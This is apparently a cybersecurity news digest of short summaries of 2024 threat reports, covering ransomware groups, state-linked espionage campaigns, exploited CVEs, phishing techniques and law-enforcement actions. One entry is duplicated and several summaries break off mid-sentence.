Recent data from Action1 indicates a growing trend of threat actors targeting edge devices, particularly load balancers, resulting in a record exploitation rate over the past three years. The study assessed various product categories from 2021 to 2023, using data from the National Vulnerability Database (NVD) and cvedetails.com to calculate the ratio of exploited vulnerabilities to total vulnerabilities.

UNC3944 Targets SaaS Applications

UNC3944, a financially motivated threat group, has been active since at least May 2022 and has evolved its tactics from credential harvesting to primarily data theft extortion without ransomware. They exploit vulnerabilities in software-as-a-service (SaaS) applications and leverage social engineering tactics to gain access to privileged accounts.

GitHub Phishing Campaign Wipes Repos, Extorts Victims

CronUp security researcher German Fernandez has shed light on a phishing and extortion campaign to target GitHub users. The campaign which has been ongoing for several months takes advantage of GitHub's notification system and a malicious OAuth app to gain access to victims' repositories and extort the contents for ransom.

Ukrainian Police Identify Suspected Affiliate of Conti, LockBit Groups

Ukrainian cyber police have identified a 28-year-old resident of Kyiv as a suspected affiliate of the notorious Conti and LockBit ransomware groups. He allegedly specialized in developing cryptors, which are tools that encrypt malware to evade antivirus detection. The man reportedly sold his services to hackers linked to the Conti and LockBit groups for cryptocurrency rewards.

Black Basta Ransomware Gang Linked to Windows Zero-Day Attacks

The Black Basta ransomware group is suspected of leveraging a critical Windows privilege escalation vulnerability, identified as CVE-2024-26169, as a zero-day exploit before Microsoft released a fix. This vulnerability, rated at 7.8 on the CVSS v3.1 scale, affects the Windows Error Reporting Service, enabling attackers to elevate their privileges to SYSTEM level.

Vietnamese Entities Targeted by China-Linked Mustang Panda in Cyber Espionage

Researchers at CrowdStrike Falcon Intelligence identified a previously unattributed TA group targeting a U.S.-based think tank with ties to China in April 2017 which revealed a larger campaign attributed to the China-based adversary Mustang Panda. Mustang Panda has likely been operational since 2014 targeting government organizations, nonprofits, religious institutions, and other NGOs across the U.S., Europe, Mongolia, Myanmar, Pakistan, Vietnam, and other regions with LNK files associated with the APT group.

Lost in the Fog: A New Ransomware Threat

Researchers at Artic Wolf Labs have released details on a new ransomware variant dubbed ‘Fog” that has been targeting the networks of US organizations in the education and recreation sectors since May, 2024. In one of the incidents observed, Fog ransomware actors performed pass-the-hash attacks to gain access to administrator accounts and further establish RDP connections to Windows servers running Hyper-V and Veeam.

UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion

Mandiant has identified a campaign by the financially motivated group UNC5537, targeting Snowflake customer database instances to steal data and extort victims. Snowflake is a multi-cloud data warehousing platform used for storing and analyzing large datasets. UNC5537 gains access to these databases using stolen customer credentials, obtained through various info stealer malware campaigns.

IoT Vulnerabilities Skyrocket, Becoming Key Entry Point for Attackers

The number of vulnerable Internet of Things (IoT) devices has surged by 136% over the past year, according to Forescout's report, "The Riskiest Connected Devices in 2024." This study, which analyzed data from nearly 19 million devices, revealed that the proportion of IoT devices with vulnerabilities increased from 14% in 2023 to 33% in 2024.

Inside Baseball: The Red Sox Cloud Security Game

The Boston Red Sox, positioned at the forefront of the American League East in baseball, are also making significant strides in cybersecurity. By adopting a comprehensive strategy that involves transitioning critical operations to a software-as-a-service (SaaS) model and embracing the Internet of Things (IoT) at Fenway Park, the team is actively bolstering its cloud security.

RansomHub Extortion Gang Linked to Now-Defunct Knight Ransomware

Researchers at Symantec have uncovered similarities between two ransomware families, RansomHub and Knight, indicating a potential rebrand of the now defunct Knight ransomware which went silent after its source code was listed for sale on hacker forums back in February 2024. Similar to Knight ransomware, RansomHub is written in the Go programming language.

Chinese South China Sea Cyberespionage Campaign Unearthed

A cyberespionage campaign recently targeted a government agency that frequently clashes with China over the South China sea. This campaign used previously undetected backdoors and had links to known Chinese state threat actors. Researchers at Sophos Managed Detection and Response uncovered this complex operation, named "Crimson Palace," and attributed it with high confidence to Chinese state-sponsored hacking clusters.

Zyxel Addressed Three RCEs in End-Of-Life NAS Devices

Zyxel Networks has released an emergency security update to address critical vulnerabilities in its end-of-life NAS devices, specifically NAS326 and NAS542 models. These vulnerabilities, identified as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974, allow attackers to perform command injection and remote code execution.

Belarusian Hackers Target Ukraine's Ministry of Defence in New Espionage Campaign

Belarusian state-sponsored hackers, UNC1151, targeted Ukraine's Ministry of Defence and a military base in a new cyberespionage operation according to Cyble Research and Intelligence Labs. Mandiant Threat Intelligence uncovered a persistent information operation called “Ghostwriter/UNC1151,” which is part of a larger influence campaign supporting Russian security interests and promoting narratives critical of NATO that has been active since March 2017 targeting audiences in Ukraine, Lithuania, Latvia, and Poland.

IT Consultants Engaged by NIST to Tackle National Vulnerability Database Backlog

Facing a burgeoning backlog of reported vulnerabilities, the National Institute of Standards and Technology (NIST) has found itself in a predicament, grappling with the daunting task of clearing its National Vulnerability Database (NVD). To tackle this challenge head-on, NIST has decided to extend its existing commercial contract with Analygence, a Maryland-based IT consultancy firm, known for its expertise in IT and security-related work.

Fake Browser Updates delivering BitRAT and Lumma Stealer

Researchers at eSentire have observed a trend in the employment of fake web browser updates to infect end users with various malware strains including SocGholish as well as Fakebat. In May 2024 eSentire's Threat Response Unit started seeing actors using this tactic to deliver BitRAT, a remote access trojan, and Lumma Stealer, a notorious info stealer malware that has gained popularity within the cybercriminal community.

APT28 Targets Key Networks in Europe With Headlace Malware

On September 4, 2023, CERT-UA reported a phishing campaign that leveraged Headlace malware to target a critical energy infrastructure facility in Ukraine. During this campaign, BlueDelta sent phishing emails from a fake sender address that contained links to archive files. The archive files contained lure images and Windows BAT script, which, if executed, would result in the whoami command being run and the results being exfiltrated back to the threat actor.

Andariel Hackers Target South Korean Institutes with New Dora RAT Malware

The North Korean linked threat actor Andariel has been using a new Golang-based backdoor called Dora RAT to target educational institutions, manufacturing firms, and construction businesses in South Korea. The AhnLab Security Intelligence Center reported that Andariel has deployed a variety of malware, including keyloggers, infostealers, and proxy tools, to control and exfiltrate data from infected systems.

Ransomware Rises Despite Law Enforcement Takedowns

Ransomware activity surged in 2023, according to a report by Google-owned Mandiant, despite extensive law enforcement efforts against major ransomware groups like ALPHV/BlackCat. The report, published on June 3, 2024, revealed a 75% increase in posts on ransomware groups' data leak sites compared to 2022, affecting victims in over 110 countries.

Check Point Warns Customers to Patch VPN Vulnerability Under Active Exploitation

Check Point has alerted its customers to a critical zero-day vulnerability (CVE-2024-24919, CVSS 8.6) affecting several products, including CloudGuard Network and Quantum Maestro. Attackers are exploiting this flaw by targeting outdated VPN local accounts using password-only authentication. Immediate software updates are crucial to mitigate the risk of unauthorized access to sensitive data and potential lateral movement within networks.

The Pumpkin Eclipse

Lumen Technologies' Black Lotus Labs identified a destructive event, as over 600,000 small office/home office (SOHO) routers were taken offline belonging to a single internet service provider (ISP). The incident took place over a 72-hour period between October 25-27, rendered the infected devices permanently inoperable, and required a hardware-based replacement.

Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors

A previously undocumented cyber espionage group named LilacSquid has been linked to targeted attacks across various sectors in the U.S., Europe, and Asia as part of a data theft campaign ongoing since at least 2021. This campaign is aimed at establishing long-term access to compromised organizations to siphon data of interest to attacker-controlled servers, according to a new technical report by Cisco Talos researcher Asheer Malhotra.

Important Details About CIRCIA Ransomware Reporting

The Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) mandates covered entities to report cyber incidents and ransomware payments to the Cybersecurity and Infrastructure Security Agency (CISA). CISA aims to swiftly deploy resources, analyze trends, and share information with network defenders.

Brazilian Banks Targeted by New AllaKore RAT Variant Called AllaSenha

Since at least early May, Banking institutions in Brazil have been observed by French cybersecurity company HarfangLab being targeted by a new campaign that deploys a custom payload variant of the Windows-based AllaKore RAT called AllaSenha. The intricate infection chain involves Python scripts and a loader developed in a language called Delphi.

Pirated Microsoft Office delivers malware cocktail on systems

AhnLab Security Intelligence Center is warning of an ongoing campaign where cybercriminals are distributing various malware strains by promoting installers for cracked versions of Microsoft Office on torrent sites. The cracked Microsoft Installer comes with a well-built interface, where users can specify the version they want to install, the language, as well as whether to use 32 or 64-bit variants.

Sav-Rx Discloses Data Breach Impacting 2.8 Million Americans

Prescription management company Sav-Rx is warning over 2.8 million people in the United States that it suffered a data breach, stating that their personal data was stolen in a 2023 cyberattack. A&A Services, doing business as Sav-RX, is a pharmacy benefit management (PBM) company that provides prescription drug management services to employers, unions, and other organizations across the U.S.

The Real Danger Lurking in the NVD Backlog

On February 12, 2024, the NIST National Vulnerability Database significantly slowed its processing and enrichment of new vulnerabilities. Since then, 12,720 new vulnerabilities have been added, but 11,885 remain unanalyzed, hindering security professionals' ability to assess affected software. By February 15, the NVD warned of analysis delays,

US-Led Operation Takes Down World's Largest Botnet

A US-led law enforcement operation has dismantled the 911 S5 botnet, believed to be the world's largest. The botnet consisted of millions of compromised residential Windows computers used for cyber-attacks, fraud, child exploitation, and other serious crimes. It included over 19 million unique IP addresses, with 613,841 in the US. Cybercriminals could buy access to these IP addresses for illegal activities.

Okta Warns of Credential Stuffing Attacks Targeting Its CORS Feature

Identity and Access Management company Okta warns that its cross-origin authentication feature in Customer Identity Cloud (CIC) is susceptible to credential-stuffing attacks. “Okta's Cross-Origin Resource Sharing (CORS) feature allows customers to add JavaScript to their websites and applications to send authentication calls to the Okta API hosted.

New Tricks in the Phishing Playbook: Cloudflare Workers, HTML Smuggling, GenAI

Researchers have raised alarms about sophisticated phishing campaigns leveraging Cloudflare Workers to deploy phishing sites aimed at harvesting credentials from multiple organizations users. These campaigns utilize a method called transparent phishing or adversary-in-the-middle phishing. This technique involves using Cloudflare Workers as a reverse proxy to legitimate login pages, intercepting traffic to capture login credentials, cookies, and tokens.

Fake Antivirus Sites Spread Malware Disguised as Avast, Malwarebytes, Bitdefender

Trellix Research has uncovered a concerning trend in cybersecurity: fake antivirus websites masquerading as legitimate security software while actually harboring malware. These deceptive sites, such as avast-securedownload[.]com and bitdefender-app[.]com, distribute harmful programs like SpyNote trojan, Lumma malware, and StealC malware under the guise of reputable antivirus brands. Instances of brand reputation attacks like these pose a significant threat, exploiting users' trust in reputable antivirus brands to distribute harmful malware.

Microsoft: Gift Card Fraud Rising, Costing Businesses up to $100,000 a Day

With US holidays like Memorial Day upcoming, Microsoft is warning up an uptick in activity from Storm-0539, a cybercriminal group operating out of Morocco that is known for targeting gift card portals linked to large retailers, luxury brands, and well-known fast-food restaurants. According to Microsoft, Storm-0539 conducts deep reconnaissance and sophisticated cloud-based techniques to target gift card creators.

Russian Hackers Shift Tactics, Target More Victims with Paid Malware

Russian hackers, particularly Advanced Persistent Threat (APT) groups, are intensifying their cyberattacks, expanding targets beyond governments and utilizing readily available malware. Flashpoint researchers reveal the evolving tactics, emphasizing the need for organizational protection. Recent reports indicate collaboration among state-sponsored groups in Iran for large-scale attacks, paralleled by activities in Russia.

Cybercriminals Exploit Cloud Storage For SMS Phishing Scams

Security researchers have uncovered a series of criminal campaigns that exploit cloud storage services. These campaigns, orchestrated by unnamed threat actors, aim to deceive users into visiting malicious websites through SMS messages. According to a technical analysis released by Enea today, the attackers have two main objectives.

Japanese Experts Warn of BLOODALCHEMY Malware Targeting Government Agencies

Researchers have recently made a significant revelation regarding the BLOODALCHEMY malware, which has been employed in targeted attacks against government organizations in Southern and Southeastern Asia. These researchers found that BLOODALCHEMY is an updated iteration of Deed RAT, considered a successor to ShadowPad—a widely recognized tool utilized in APT campaigns.

Japanese Experts Warn of BLOODALCHEMY Malware Targeting Government Agencies

Researchers have recently made a significant revelation regarding the BLOODALCHEMY malware, which has been employed in targeted attacks against government organizations in Southern and Southeastern Asia. These researchers found that BLOODALCHEMY is an updated iteration of Deed RAT, considered a successor to ShadowPad—a widely recognized tool utilized in APT campaigns.

From Trust to Trickery: Brand Impersonation Over the Email Attack Vector

Cisco researchers have discovered various techniques used by cybercriminals to embed and deliver brand logos within emails, targeting users through brand impersonation. This widespread threat leverages the familiarity and trust associated with well-known brand logos to solicit sensitive information, particularly in phishing emails where attackers aim to deceive recipients into revealing credentials or other valuable information.

Inside Operation Diplomatic Specter: Chinese APT Group's Stealthy Tactics Exposed

A Chinese APT group has been targeting governmental entities in the Middle East, Africa, and Asia since late 2022 as part of a cyber espionage campaign named Operation Diplomatic Specter. According to researchers from Palo Alto Networks Unit 42, this group has conducted long-term espionage against at least seven government entities, employing sophisticated email exfiltration techniques.

Threat Actor Claiming Access to AWS, Azure, & GitHub API Keys

According to a post on X (formerly known as Twitter), a threat actor is claiming to have gained access to a handful of API keys for major cloud service providers, including Amazon Web Services (AWS), Microsoft Azure, GitHub, etc. The actor who goes by the alias “carlos_hank,” stated that these keys are “fresh and all working,” with high permissions that can be used to compromise entire cloud infrastructures.

Chinese Hackers Rely on Covert Proxy Networks to Evade Detection

Chinese-backed threat actors, including groups like Volt Typhoon, are increasingly using proxy networks known as operational relay boxes for cyber espionage, according to a Mandiant report published on May 22. ORBs, similar to botnets, are mesh networks comprising compromised devices like virtual private servers, Internet of Things devices, smart devices, and routers.

Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel

An Iranian threat actor affiliated with one of the Iranian intelligence agencies has been observed conducting destructive wiping attacks that target Albania and Israel. Cybersecurity firm Check Point is tracking the activity under the moniker Void Manticore, which is also known as Storm-842 (formerly DEV-0842) by Microsoft. The techniques, tactics, and procedures (TTPs) employed by Void Manticore are relatively straightforward and simple, involving hands-on efforts using basic, mostly publicly available tools.

Critical Fluent Bit Flaw Impacts All Major Cloud Providers

A critical vulnerability in Fluent Bit has been identified, impacting major cloud providers and numerous tech giants by exposing them to denial-of-service and remote code execution attacks. Fluent Bit, a popular logging and metrics solution for Windows, Linux, and macOS, is embedded in major Kubernetes distributions.

Ransomware and AI-Powered Hacks Drive Cyber Investment

The surge in sophisticated cyber-attacks has led to significant financial implications for businesses. Ransomware attacks, in particular, have become increasingly prevalent and costly. These attacks involve encrypting a victim's data and demanding payment, typically in cryptocurrency, for its release.

New Android Banking Trojan Mimics Google Play Update App

Cyble Research and Intelligence Labs has uncovered a new banking trojan dubbed “Antidot” targeting Android devices by posing as a Google Play update application. Users who install the application are presented with a counterfeit Google Play update page that contains a “continue” button designed to redirect to the Android device's Accessibility settings. I

Springtail: New Linux Backdoor Added to Toolkit

Symantec's Threat Hunter Team recently uncovered a new Linux backdoor, Linux.Gomir, developed by the North Korean Springtail espionage group, linked to a recent campaign against South Korean organizations. This group, also known as Kimsuky, has a history of targeting South Korean public sector organizations and was previously identified in attacks dating back to 2014.

Botnet Sent Millions of Emails in LockBit Black Ransomware Campaign

ew Jersey's Cybersecurity and Communications Integration Cell (NJCCIC) disclosed that it uncovered a new LockBit campaign where actors are sending millions of phishing emails with the help of the Phorpiex botnet to infect potential victims with LockBit Black, an encryptor that was likely built using the LockBit 3.0 builder that was leaked by a disgruntled developer on Twitter in September 2022.

Mallox Ransomware Deployed Via MS-SQL Honeypot Attack

An instance involving a MS-SQL honeypot has shed light on the sophisticated tactics employed by cyber-attackers relying on Mallox ransomware. The honeypot, set up by researchers at Sekoia, was targeted by an intrusion set utilizing brute force techniques to deploy the Mallox ransomware via PureCrypter to exploit various MS-SQL vulnerabilities. Upon analyzing Mallox samples, the researchers identified two distinct affiliates using different approaches.

Hackers Use DNS Tunneling to Scan and Track Victims

Threat actors are using DNS tunneling to track when targets open phishing emails and click malicious links, as well as to scan networks for vulnerabilities. DNS tunneling involves encoding data or commands within DNS queries, turning DNS into a covert communication channel. The attackers use various encoding methods, such as Base16, Base64, or custom algorithms, to transmit data via DNS records like TXT, MX, CNAME, and Address records.

Ongoing Campaign Bombards Enterprises with Spam Emails and Phone Calls

Cybersecurity researchers at Rapid7 have uncovered an ongoing social engineering campaign that barrages enterprises with spam emails with the goal of obtaining initial access to their environments for follow-on exploitation. The social engineering tactics involve overwhelming a potential victim's email with junk mail, calling the victim user, and offering them assistance with the issue.

Government's Addiction to Contractors Is Creating a Data Crisis

The rapid advancement of artificial intelligence and the proliferation of data worldwide, estimated to reach 200 zettabytes, have ushered in an era of unprecedented technological growth. However, despite this data abundance, there exists a crisis in accessing research data, with the government and private sector being identified as primary contributors to the problem.

North Korean Hackers Deploy New Golang Malware 'Durian' Against Crypto Firms

The North Korean APT group Kimsuky has been observed by Kaspersky deploying a previously undocumented Golang-based malware dubbed Durian in targeted cyberattacks against two South Korean cryptocurrency firms. Kaspersky states that Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads, and exfiltration of files.

'The Mask' Espionage Group Resurfaces After 10-Year Hiatus

Careto, also known as "The Mask," resurfaced after a lengthy hiatus, launching a cyber-espionage campaign targeting organizations primarily in Latin America and Central Africa. This APT group was initially active from 2007 to 2013, during which it targeted a diverse range of victims across 31 countries, including prominent entities like government institutions, diplomatic offices, energy companies, research institutions, and private equity firms.

GoTo Meeting Loads Remcos RAT via Rust Shellcode Loader

There has been a notable rise in cyber threats exploiting legitimate software platforms to propagate malicious payloads. Among these threats is the Remcos RAT, a sophisticated remote access tool favored by cybercriminals. Cyber attackers have leveraged trusted applications like GoTo Meeting to facilitate the deployment of the Remcos RAT, employing advanced techniques to evade detection and compromise systems.

Widely Used Telit Cinterion Modems Open to SMS Takeover Attacks

Security researchers at Kaspersky's ICS CERT division revealed a series of eight vulnerabilities, including CVE-2023-47610 through CVE-2023-47616, in Telit Cinterion cellular modems, prevalent across industrial, healthcare, and telecommunications sectors. The most severe flaw, CVE-2023-47610, enables remote code execution via SMS, granting attackers unauthorized access to the modem's operating system without authentication.

In the Shadow of Venus: Trinity Ransomware's Covert Ties

CRIL (Cyble Research and Intelligence Labs) has uncovered a new ransomware variant dubbed Trinity, notable for its utilization of a double extortion tactic. This method involves exfiltrating victim data before initiating encryption and subsequently demanding ransom payments. The threat actors behind Trinity operate victim support and data leak sites, enhancing their coercive capabilities (T1486).

GhostStripe Attack Haunts Self-Driving Cars by Making Them Ignore Road Signs

A group of researchers, primarily from Singapore-based universities, has demonstrated the feasibility of attacking autonomous vehicles by exploiting their reliance on camera-based computer vision systems. Dubbed GhostStripe, the attack manipulates the sensors used by brands like Tesla and Baidu Apollo, which rely on complementary metal oxide semiconductor (CMOS) sensors.

New 'LLMjacking' Attack Exploits Stolen Cloud Credentials

The Sysdig Threat Research Team recently conducted a study on a new cyber attack termed “LLMjacking”, which specifically targets cloud-hosted large language model services by exploiting stolen cloud credentials. These credentials were obtained from a vulnerable version of Laravel (CVE-2021-3120).

Hijack Loader Malware Employs Process Hollowing, UAC Bypass in Latest Version

A new version of the malware loader, Hijack Loader, has been spotted by researchers at Zscaler which comes with an updated set of anti-analysis techniques to fly under the radar. In total, the latest variant comes with 7 new modules. Notably, one of these modules is designed to bypass User Account Control (UAC), a security feature on Windows designed to prevent unauthorized changes to the operating system.

Massive Webshop Fraud Ring Steals Credit Cards From 850,000 People

BogusBazaar, the vast network of fake online shops, was discovered by Security Research Labs GmbH to have successfully deceived over 850,000 individuals in the United States and Europe. This operation, which has been active for three years since 2021, has aimed to process around $50 million in fraudulent purchases by stealing credit card information and attempting fake transactions. The operations of BogusBazaar involves the creation of over 75,000 fake webshops.

New Attack Leaks VPN Traffic Using Rogue DHCP Servers

"TunnelVision" is a newly discovered cyber threat that exploits a vulnerability in the Dynamic Host Configuration Protocol to bypass the encryption of VPNs. This attack method, outlined in a report by Leviathan Security, enables malicious actors to intercept and surveil unencrypted data while maintaining the facade of a secure VPN connection.

China-Linked Attackers Successfully Targeting Network Security Devices, Worrying Officials

At the RSA Conference in San Francisco, cybersecurity experts revealed concerns about China-linked espionage groups exploiting zero-day vulnerabilities to infiltrate US critical infrastructure and businesses. Charles Carmakal from Mandiant Consulting highlighted how these attackers target network security devices that lack endpoint detection and response capabilities, such as routers and firewalls.

Critical Tinyproxy Flaw Opens Over 50,000 Hosts to Remote Code Execution

Over 52,000 out of 90,310 hosts with Tinyproxy services are vulnerable to a severe security flaw CVE-2023-49606, which exposes them to potential remote code execution. This vulnerability, with a CVSS score of 9.8 out of 10, affects Tinyproxy versions 1.10.0 and 1.11.1. The vulnerability arises from a use-after-free bug triggered by a specially crafted HTTP Connection header.

China-Linked Hackers Suspected in ArcaneDoor Cyberattacks Targeting Network Devices

ArcaneDoor, a cyber espionage campaign targeting network devices from multiple vendors, including Cisco, has been linked to China-linked actors based on findings from Censys. The campaign, attributed to a sophisticated state-sponsored actor known as UAT4356 or Storm-1849, began around July 2023 and continued with the first confirmed attack using custom malware named Line Runner and Line Dancer in January 2024.

Lockbit's Seized Site Comes Alive to Tease New Police Announcements

Law enforcement agencies, collaborated in a significant operation named Operation Cronos. This operation successfully dismantled the infrastructure of the LockBit ransomware group on February 19th. It involved seizing 34 servers that hosted the data leak website, along with data stolen from victims, cryptocurrency addresses, 1,000 decryption keys, and the affiliate panel used by LockBit.

New 'Cuckoo' Persistent macOS Spyware Targeting Intel and Arm Macs

The discovery of Cuckoo highlights the ongoing arms race between cybersecurity researchers and malicious actors. This malware's sophistication, from its ability to evade detection to its multifaceted information-gathering capabilities, showcases the level of expertise adversaries have attained in crafting highly effective threats.

Hackers Target New NATO Member Sweden with Surge of DDoS Attacks

According to metrics collected by network performance management provider Netscout, distributed denial of service attacks (DDoS) targeting Sweden surged in volume between 2023 and 2024 as the country was in the process of joining NATO. Netscout notes that DDoS attacks against Swedish organizations started picking up significantly in late 2023 with 730 Gbps attacks.

Top Threat Actors, Malware, Vulnerabilities and Exploits

The recent report from Picussecurity outlines threats, malware, vulnerabilities, and exploits for the first week of May. Critical vulnerabilities, including CVE-2024-27322 in R Programming Language and three in Judge0, pose significant risks. Malware activities involve Wpeeper Android malware utilizing compromised WordPress sites and the Dev Popper campaign targeting developers with a Python RAT.

Senators Reprimand UnitedHealth CEO in Ransomware Hearing

During a government hearing on Wednesday, senators strongly criticized UnitedHealth Group CEO Andrew Witty for the organization's inadequate security measures leading up to the February ransomware attack on Change Healthcare, a subsidiary. Witty confirmed a $22 million ransom payment and acknowledged potential data theft affecting one-third of Americans.

New "Goldoon" Botnet Targets D-Link Routers With Decade-Old Flaw

A newly discovered botnet named Goldoon has emerged, specifically targeting D-Link routers by exploiting a critical security flaw known as CVE-2015-2051. This flaw, with a high CVSS score of 9.8, impacts D-Link DIR-645 routers, allowing malicious actors to execute arbitrary commands remotely via specially crafted HTTP requests.

New Cuttlefish Malware Infects Routers to Monitor Traffic For Credentials

Lumen Technologies' Black Lotus Labs has uncovered a new malware dubbed ‘Cuttlefish' that has been observed infecting enterprise-grade and small office/home office routers to monitor data passing through them and steal authentication information. The malware supports various router architectures with builds for ARM, i386, i386_i686, i386_x64, mips32, and mips64.

Food and Ag-ISAC Alert: Pro-Russian Hacktivists Targeting HMI Vulnerabilities in OT Networks

Threat actors continue to target operational technology as a means to disrupt critical infrastructure networks, or to deliver malware as a just-in-case measure for increasing global conflicts. Earlier this year we reported on IRGC-Affiliated Cyber Actors targeting Israeli produced programmable logic controllers (PLCs) to disrupt the water sector. We also highlighted reports of Chinese (PRC) state-Sponsored actors compromising and maintaining persistent access to U.S. critical infrastructure with strategic and destructive malware.

Kapeka: A New Toolkit in the Arsenal of SandStorm

Kapeka, also known as KnuckleTouch, emerged around mid-2022 but gained formal tracking in 2024 due to its involvement in limited-scope attacks, notably in Eastern Europe. It's associated with the Sandstorm Group, operated by Russia's Military Unit 74455, known for disruptive cyber activities, particularly targeting Ukraine's critical infrastructure.

New Latrodectus Malware Attacks Use Microsoft, Cloudflare Themes

Latrodectus, also known as Unidentified 111 and IceNova, is a Windows malware downloader that acts as a backdoor, allowing threat actors to gain unauthorized access to compromised systems. The malware was initially discovered by Walmart's security team and later analyzed by cybersecurity firms such as ProofPoint and Team Cymru.

Threat Actor Profile: SideCopy

Operation SideCopy is a sophisticated cyber operation originating from Pakistan and primarily targeting Indian defense forces and personnel. Since its inception in early 2019, the threat group has demonstrated a high level of adaptability, continuously evolving its malware modules to avoid detection and maintain operational effectiveness. Notably, SideCopy closely monitors antivirus detections and promptly updates its modules in response.

China-Linked 'Muddling Meerkat' Hijacks DNS to Map Internet on Global Scale

A newly discovered cyber threat known as Muddling Meerkat has been actively engaging in sophisticated DNS activities since October 2019. This threat is believed to have affiliations with the People's Republic of China due to its utilization of DNS open resolvers from Chinese IP space and its potential control over the Great Firewall, which is known for censoring internet access and manipulating internet traffic in and out of China.

Over 1,400 CrushFTP Servers Vulnerable To Actively Exploited Bug

Last Friday, CrushFTP disclosed details of critical severity server-side template injection vulnerability in its file transfer software that is being actively exploited in attacks in the wild. Tracked as CVE-2024-4040, the flaw could enable actors to perform a virtual file system escape to read any file on the server's file system, gain administrative privileges, and perform remote code execution to effectively compromise unpatched systems.

Palo Alto Networks Outlines Remediation for Critical PAN-OS Flaw Under Attack

Palo Alto Networks has issued remediation guidance for a critical security flaw, CVE-2024-3400, impacting PAN-OS, which is actively being exploited. This flaw allows unauthenticated remote shell command execution and has been observed in multiple versions of PAN-OS. Dubbed "Operation MidnightEclipse," the exploit involves dropping a Python-based backdoor named UPSTYLE, enabling execution of commands through crafted requests.

CISA: Cisco and CrushFTP Vulnerabilities Need Urgent Patches

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent directive for federal civilian agencies to patch three critical vulnerabilities within a week. These vulnerabilities include two affecting Cisco products (CVE-2024-20353 and CVE-2024-20359) and one impacting CrushFTP, a popular file transfer tool. The exploits are being actively utilized by state-sponsored threat actors, posing significant risks to network security.

Nespresso Domain Hijacked in Phishing Attack Targeting Microsoft Logins

Perception Point researchers have identified a new phishing campaign utilizing compromised accounts to target users through an open redirect vulnerability discovered within a Nespresso domain. Nespresso is a coffee manufacturer. This redirect method allows attacks to bypass standard endpoint detection security measures assuming that these measures do not check for hidden or embedded links.

Autodesk Hosting PDF Files Used in Microsoft Phishing Attacks

A campaign has been uncovered by researchers at Netcraft, where actors are using compromised email accounts to send phishing emails to existing contacts. These emails contain shortened URL links (generated using the autode[.]sk URL shortener) that lead to malicious PDF documents hosted on Autodesk Drive, a data-sharing platform.

Advanced Cyber Threats Impact Even the Most Prepared

This blog post from MITRE highlights a recent cyber intrusion they experienced, emphasizing the evolving tactics of foreign nation-state cyber adversaries. The breach, discovered in April 2024, involved the exploitation of zero-day vulnerabilities in Ivanti Connect Secure VPNs and subsequent lateral movement into their VMware infrastructure.

DPRK Hacking Groups Breach South Korean Defense Contractors

The National Police Agency in South Korea has issued an urgent warning regarding ongoing cyberattacks targeting defense industry entities by North Korean hacking groups. The police discovered several instances of successful breaches involving the hacking groups Lazarus, Andariel, and Kimsuky, all linked to the North Korean hacking apparatus.

LOCKBIT Black's Legacy: Unraveling the DragonForce Ransomware Connection

Key takeaways from the Cyble Research & Intelligence Labs (CRIL) report on DragonForce ransomware reveal significant insights. CRIL identified DragonForce ransomware as being based on LOCKBIT Black ransomware, suggesting that the threat actors behind DragonForce utilized a leaked builder of LOCKBIT Black to generate their binary. This discovery was made after an X user shared the download link for the LockBit ransomware builder in September 2022. DragonForce ransomware surfaced in November 2023, employing double extortion tactics and targeting victims worldwide.

Hackers Hijack Antivirus Updates to Drop Guptiminer Malware

GuptiMiner, a malware tool reportedly used by North Korean hackers, has recently come into the spotlight due to its sophisticated capabilities and the manner in which it has been deployed. The attack vector involves exploiting vulnerabilities in the update mechanism of eScan antivirus software, allowing the attackers to plant backdoors and deploy cryptocurrency miners on targeted networks.

Ransomware Double-Dip: Re-Victimization in Cyber Extortion

In the realm of cyber extortion, re-victimization often stems from a combination of desperation and strategic maneuvering by threat actors. For instance, repeat attacks against victims may exploit persistent vulnerabilities that were not adequately addressed or leverage new entry points, such as phishing campaigns or compromises in third-party services.

Cybercriminals Pose as LastPass Staff to Hack Password Vaults

LastPass has disclosed details of a campaign targeting its customers using the CryptoChameleon phishing kit. CryptoChameleon is a phishing-as-a-service that enables threat actors to easily generate fake SSO or other login sites impersonating the legitimate sites of companies to steal credentials and other information that can be used for authentication.

Quishing Attacks Jump Tenfold, Attachment Payloads Halve

Quishing attacks, a type of phishing that exploits QR codes, has seen siginificant rise from 0.8% in 2021 to 10.8% in 2024, according to the latest finding from Egress. At the same time, the report notes a substantial decline in attachment-based payloads, which decreased by half from 72.7% to 35,7%. Impersonation attacks continue to be a prevalent threat, with 77% if them masquerading as well-known brands such as DocuSign and Microsoft.

Ransomware Victims Who Pay a Ransom Drops to Record Low

The latest trends in ransomware paint a complex picture of evolving dynamics within the cybercriminal ecosystem. Coverware's report highlights a notable decrease in ransom payments, with only 28% of victims opting to pay in the first quarter of 2024, marking a significant drop from previous periods. This shift is attributed to improved resilience among businesses, allowing them to recover from attacks without succumbing to ransom demands.

Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

In February 2024, Kaspersky discovered a new malware campaign targeting government entities in the Middle East actively employing over 30 DuneQuixote dropper samples. The droppers come in the form of either using a regular malware dropper or abusing a legitimate tool named “Total Commander” which both carry malicious code to download additional malware using a backdoor method Kaspersky has named “CR4T”.

FIN7 Targets American Automaker's IT Staff In Phishing Attacks

Researchers at BlackBerry have disclosed details of a spear-phishing campaign identified in late 2023 that targeted a large automotive manufacturer based in the United States. The campaign has been attributed to a financially motived threat actor called FIN7 and initiated with spear-phishing emails targeting highly privileged employees in the IT department of the unnamed U.S. based manufacturer.

Hackers Hijack OpenMetadata Apps in Kubernetes Cryptomining Attacks

Security researchers at Microsoft recently discovered a malware campaign exploiting new critical vulnerabilities in OpenMetadata to compromise Kubernetes environments, gain access to Kubernetes workloads and abuse them for malicious cryptomining activity. OpenMetadata is an open-source platform designed to manage metadata across various data sources. It serves as a central repository for users to discover, understand, and govern their data.

StopRansomware-Akira-Ransomware

This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors.

Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware

